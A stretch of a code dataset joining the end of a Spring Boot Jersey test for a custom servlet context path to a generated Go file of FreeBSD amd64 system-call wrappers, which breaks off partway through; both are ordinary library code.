org.springframework.test.annotation.DirtiesContext;\n\nimport static org.assertj.core.api.Assertions.assertThat;\n\n/**\n * Tests for {@link JerseyAutoConfiguration} when using custom servlet paths.\n *\n * @author Dave Syer\n */\n@SpringBootTest(webEnvironment = WebEnvironment.RANDOM_PORT, properties = \"server.servlet.contextPath=/app\")\n@DirtiesContext\nclass JerseyAutoConfigurationCustomServletContextPathTests {\n\n\t@Autowired\n\tprivate TestRestTemplate restTemplate;\n\n\t@Test\n\tvoid contextLoads() {\n\t\tResponseEntity entity = this.restTemplate.getForEntity(\"/rest/hello\", String.class);\n\t\tassertThat(entity.getStatusCode()).isEqualTo(HttpStatus.OK);\n\t}\n\n\t@MinimalWebConfiguration\n\t@ApplicationPath(\"/rest\")\n\t@Path(\"/hello\")\n\tpublic static class Application extends ResourceConfig {\n\n\t\t@Value(\"${message:World}\")\n\t\tprivate String msg;\n\n\t\tApplication() {\n\t\t\tregister(Application.class);\n\t\t}\n\n\t\t@GET\n\t\tpublic String message() {\n\t\t\treturn \"Hello \" + this.msg;\n\t\t}\n\n\t\tstatic void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Documented\n\t@Configuration\n\t@Import({ ServletWebServerFactoryAutoConfiguration.class, JerseyAutoConfiguration.class,\n\t\t\tPropertyPlaceholderAutoConfiguration.class })\n\tprotected @interface MinimalWebConfiguration {\n\n\t}\n\n}\n"} {"text": "// mksyscall.pl -tags freebsd,amd64 syscall_bsd.go syscall_freebsd.go syscall_freebsd_amd64.go\n// Code generated by the command above; see README.md. DO NOT EDIT.\n\n// +build freebsd,amd64\n\npackage unix\n\nimport (\n\t\"syscall\"\n\t\"unsafe\"\n)\n\nvar _ syscall.Errno\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc getgroups(ngid int, gid *_Gid_t) (n int, err error) {\n\tr0, _, e1 := RawSyscall(SYS_GETGROUPS, uintptr(ngid), uintptr(unsafe.Pointer(gid)), 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc setgroups(ngid int, gid *_Gid_t) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETGROUPS, uintptr(ngid), uintptr(unsafe.Pointer(gid)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid int, err error) {\n\tr0, _, e1 := Syscall6(SYS_WAIT4, uintptr(pid), uintptr(unsafe.Pointer(wstatus)), uintptr(options), uintptr(unsafe.Pointer(rusage)), 0, 0)\n\twpid = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err error) {\n\tr0, _, e1 := Syscall(SYS_ACCEPT, uintptr(s), uintptr(unsafe.Pointer(rsa)), uintptr(unsafe.Pointer(addrlen)))\n\tfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) {\n\t_, _, e1 := Syscall(SYS_BIND, uintptr(s), uintptr(addr), uintptr(addrlen))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) {\n\t_, _, e1 := Syscall(SYS_CONNECT, uintptr(s), uintptr(addr), uintptr(addrlen))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc socket(domain int, typ int, proto int) (fd int, err error) {\n\tr0, _, e1 := RawSyscall(SYS_SOCKET, uintptr(domain), uintptr(typ), uintptr(proto))\n\tfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *_Socklen) (err error) {\n\t_, _, e1 := Syscall6(SYS_GETSOCKOPT, uintptr(s), uintptr(level), uintptr(name), uintptr(val), uintptr(unsafe.Pointer(vallen)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc setsockopt(s int, level int, name int, val unsafe.Pointer, vallen uintptr) (err error) {\n\t_, _, e1 := Syscall6(SYS_SETSOCKOPT, uintptr(s), uintptr(level), uintptr(name), uintptr(val), uintptr(vallen), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err error) {\n\t_, _, e1 := RawSyscall(SYS_GETPEERNAME, uintptr(fd), uintptr(unsafe.Pointer(rsa)), uintptr(unsafe.Pointer(addrlen)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err error) {\n\t_, _, e1 := RawSyscall(SYS_GETSOCKNAME, uintptr(fd), uintptr(unsafe.Pointer(rsa)), uintptr(unsafe.Pointer(addrlen)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Shutdown(s int, how int) (err error) {\n\t_, _, e1 := Syscall(SYS_SHUTDOWN, uintptr(s), uintptr(how), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) {\n\t_, _, e1 := RawSyscall6(SYS_SOCKETPAIR, uintptr(domain), uintptr(typ), uintptr(proto), uintptr(unsafe.Pointer(fd)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen *_Socklen) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(p) > 0 {\n\t\t_p0 = unsafe.Pointer(&p[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall6(SYS_RECVFROM, uintptr(fd), uintptr(_p0), uintptr(len(p)), uintptr(flags), uintptr(unsafe.Pointer(from)), uintptr(unsafe.Pointer(fromlen)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _Socklen) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p0 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall6(SYS_SENDTO, uintptr(s), uintptr(_p0), uintptr(len(buf)), uintptr(flags), uintptr(to), uintptr(addrlen))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc recvmsg(s int, msg *Msghdr, flags int) (n int, err error) {\n\tr0, _, e1 := Syscall(SYS_RECVMSG, uintptr(s), uintptr(unsafe.Pointer(msg)), uintptr(flags))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc sendmsg(s int, msg *Msghdr, flags int) (n int, err error) {\n\tr0, _, e1 := Syscall(SYS_SENDMSG, uintptr(s), uintptr(unsafe.Pointer(msg)), uintptr(flags))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Pointer, nevent int, timeout *Timespec) (n int, err error) {\n\tr0, _, e1 := Syscall6(SYS_KEVENT, uintptr(kq), uintptr(change), uintptr(nchange), uintptr(event), uintptr(nevent), uintptr(unsafe.Pointer(timeout)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen uintptr) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(mib) > 0 {\n\t\t_p0 = unsafe.Pointer(&mib[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall6(SYS___SYSCTL, uintptr(_p0), uintptr(len(mib)), uintptr(unsafe.Pointer(old)), uintptr(unsafe.Pointer(oldlen)), uintptr(unsafe.Pointer(new)), uintptr(newlen))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc utimes(path string, timeval *[2]Timeval) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_UTIMES, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(timeval)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc futimes(fd int, timeval *[2]Timeval) (err error) {\n\t_, _, e1 := Syscall(SYS_FUTIMES, uintptr(fd), uintptr(unsafe.Pointer(timeval)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc fcntl(fd int, cmd int, arg int) (val int, err error) {\n\tr0, _, e1 := Syscall(SYS_FCNTL, uintptr(fd), uintptr(cmd), uintptr(arg))\n\tval = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc poll(fds *PollFd, nfds int, timeout int) (n int, err error) {\n\tr0, _, e1 := Syscall(SYS_POLL, uintptr(unsafe.Pointer(fds)), uintptr(nfds), uintptr(timeout))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Madvise(b []byte, behav int) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(b) > 0 {\n\t\t_p0 = unsafe.Pointer(&b[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall(SYS_MADVISE, uintptr(_p0), uintptr(len(b)), uintptr(behav))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mlock(b []byte) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(b) > 0 {\n\t\t_p0 = unsafe.Pointer(&b[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall(SYS_MLOCK, uintptr(_p0), uintptr(len(b)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mlockall(flags int) (err error) {\n\t_, _, e1 := Syscall(SYS_MLOCKALL, uintptr(flags), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mprotect(b []byte, prot int) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(b) > 0 {\n\t\t_p0 = unsafe.Pointer(&b[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall(SYS_MPROTECT, uintptr(_p0), uintptr(len(b)), uintptr(prot))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Msync(b []byte, flags int) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(b) > 0 {\n\t\t_p0 = unsafe.Pointer(&b[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall(SYS_MSYNC, uintptr(_p0), uintptr(len(b)), uintptr(flags))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Munlock(b []byte) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(b) > 0 {\n\t\t_p0 = unsafe.Pointer(&b[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall(SYS_MUNLOCK, uintptr(_p0), uintptr(len(b)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Munlockall() (err error) {\n\t_, _, e1 := Syscall(SYS_MUNLOCKALL, 0, 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc pipe2(p *[2]_C_int, flags int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_PIPE2, uintptr(unsafe.Pointer(p)), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getcwd(buf []byte) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p0 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall(SYS___GETCWD, uintptr(_p0), uintptr(len(buf)), 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ioctl(fd int, req uint, arg uintptr) (err error) {\n\t_, _, e1 := Syscall(SYS_IOCTL, uintptr(fd), uintptr(req), uintptr(arg))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Access(path string, mode uint32) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_ACCESS, uintptr(unsafe.Pointer(_p0)), uintptr(mode), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Adjtime(delta *Timeval, olddelta *Timeval) (err error) {\n\t_, _, e1 := Syscall(SYS_ADJTIME, uintptr(unsafe.Pointer(delta)), uintptr(unsafe.Pointer(olddelta)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc CapEnter() (err error) {\n\t_, _, e1 := Syscall(SYS_CAP_ENTER, 0, 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc capRightsGet(version int, fd int, rightsp *CapRights) (err error) {\n\t_, _, e1 := Syscall(SYS___CAP_RIGHTS_GET, uintptr(version), uintptr(fd), uintptr(unsafe.Pointer(rightsp)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc capRightsLimit(fd int, rightsp *CapRights) (err error) {\n\t_, _, e1 := Syscall(SYS_CAP_RIGHTS_LIMIT, uintptr(fd), uintptr(unsafe.Pointer(rightsp)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Chdir(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_CHDIR, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Chflags(path string, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_CHFLAGS, uintptr(unsafe.Pointer(_p0)), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Chmod(path string, mode uint32) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_CHMOD, uintptr(unsafe.Pointer(_p0)), uintptr(mode), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Chown(path string, uid int, gid int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_CHOWN, uintptr(unsafe.Pointer(_p0)), uintptr(uid), uintptr(gid))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Chroot(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_CHROOT, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Close(fd int) (err error) {\n\t_, _, e1 := Syscall(SYS_CLOSE, uintptr(fd), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Dup(fd int) (nfd int, err error) {\n\tr0, _, e1 := Syscall(SYS_DUP, uintptr(fd), 0, 0)\n\tnfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Dup2(from int, to int) (err error) {\n\t_, _, e1 := Syscall(SYS_DUP2, uintptr(from), uintptr(to), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Exit(code int) {\n\tSyscall(SYS_EXIT, uintptr(code), 0, 0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_GET_FD, uintptr(fd), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p0)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_SET_FD, uintptr(fd), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p0)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_EXTATTR_DELETE_FD, uintptr(fd), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p0)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) (ret int, err error) {\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_LIST_FD, uintptr(fd), uintptr(attrnamespace), uintptr(data), uintptr(nbytes), 0, 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrGetFile(file string, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(file)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_GET_FILE, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrSetFile(file string, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(file)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_SET_FILE, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrDeleteFile(file string, attrnamespace int, attrname string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(file)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_EXTATTR_DELETE_FILE, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrListFile(file string, attrnamespace int, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(file)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_LIST_FILE, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(data), uintptr(nbytes), 0, 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrGetLink(link string, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_GET_LINK, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrSetLink(link string, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_SET_LINK, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrDeleteLink(link string, attrnamespace int, attrname string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_EXTATTR_DELETE_LINK, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrListLink(link string, attrnamespace int, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_LIST_LINK, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(data), uintptr(nbytes), 0, 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fadvise(fd int, offset int64, length int64, advice int) (err error) {\n\t_, _, e1 := Syscall6(SYS_POSIX_FADVISE, uintptr(fd), uintptr(offset), uintptr(length), uintptr(advice), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY 